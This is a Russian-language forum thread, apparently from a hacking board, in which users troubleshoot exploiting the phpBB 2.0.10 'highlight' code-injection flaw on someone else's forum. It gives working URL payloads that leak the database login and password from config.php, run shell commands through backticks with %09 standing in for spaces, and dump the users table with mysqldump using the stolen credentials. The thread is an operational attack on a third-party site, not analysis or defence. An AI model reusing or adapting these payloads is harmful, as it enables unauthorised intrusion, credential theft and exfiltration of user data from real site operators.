phpbb 2.0.10 тех вопрос
 

Наткнулся на один форум, там &highlight=%2527.$poster=$dbpasswd.%2527 - бага канает, выводится пасс для бд, так же и логин, но больше ни одна бага не работает, если ковырнуть на &highlight=%2527.$poster=%60$ls%60.%2527&ls=
id;uname%20-a; - выводится )b#i
и всё ни одна из команд не работает, врятли багу там прикрыли, кто нить с этим сталкивался???

если не ошибаюсь %20 - это не тот символ который здесь заменяет пробел...

Вот после этого ты должен писать команды которые там frik написал

id;uname%20-a;

Вроде бы... там так написано типа... потому что закрывать эту всю муть должны вроде б ы символы %2527, нЭ?

Дык ясный день, дело в том что ни одна из команд не работает, типа cd..;pwd;ls -l - думаю понятно что это, в том то и беда, что не работают они, где-то я читал мол значит сервак не под линухом, но каким макаром тогда берётся инфа из config.php с помощью
&highlight=%2527.$poster=$dbpasswd.%2527 ???

Ну тогда не знаю, дай линк хоть на тот форум.

Скорее всего,выключен register globals.
Попробуй вот так:
p=123&highlight=%2527.$poster=%60ls%09-la%60.%2527
Вместо пробела %09
Дамп базы:
p=123&highlight=%2527.$poster=%60/путь/mysqldump%09-uИмяЮзераБазы%09-pПарольБазы%09ИмяБазы%09преф� �кс_users%09>%09db.sql%60.%2527

ИмяЮзераБазы:$poster=$dbuser
ПарольБазы:$poster=$dbpasswd
ИмяБазы:$poster=$dbname
Префикс:$poster=$table_prefix(обычно phpbb_)

X-Seven, а /путь/
чего указывать? Покажи пример...
uИмяЮзераБазы%09- А зачем эта чёрточка в конце?
Вообщем только что проверил - не работает дамп базы.

Вот так типа по этой схеме надо делать:
mysqldump --opt -uLOGIN -pPASS DBNAME > dump.sql

LOGIN=dbuser
PASS=dbpasswd
DBNAME=dbname